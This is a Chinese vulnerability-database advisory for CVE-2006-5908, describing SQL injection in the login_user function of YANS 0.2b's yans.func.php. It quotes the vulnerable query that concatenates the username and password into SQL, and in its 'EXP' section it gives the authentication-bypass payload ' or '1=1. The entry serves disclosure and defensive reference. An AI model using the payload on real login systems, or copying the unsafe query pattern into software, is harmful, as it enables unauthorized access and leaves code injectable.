YANS yans.func.php 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192876 漏洞类型 SQL注入
发布时间 2006-11-15 更新时间 2006-11-15
CVE编号 CVE-2006-5908 CNNVD-ID CNNVD-200611-247
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006110069
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-247
|漏洞详情
LucasRodriguezSanPedroYetAnotherNewsSystem(YANS)0.2b中的yans.func.php的login_user函数存在多个SQL注入漏洞,远程攻击者可通过(1)用户名或(2)密码参数来执行任意SQL命令。
|漏洞EXP
Product: YANS (yet another news system)
Link: http://sourceforge.net/projects/yans/

vuln code:
$resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error());
        
simple sql injection
' or '1=1
' or '1=1

-navairum
|参考资料

来源:XF
名称:yans-username-sql-injection(30119)
链接:http://xforce.iss.net/xforce/xfdb/30119
来源:BID
名称:20963
链接:http://www.securityfocus.com/bid/20963
来源:BUGTRAQ
名称:20061108Y.A.N.Ssqlinjection
链接:http://archives.neohapsis.com/archives/bugtraq/2006-11/0121.html
来源:SREASON
名称:1866
链接:http://securityreason.com/securityalert/1866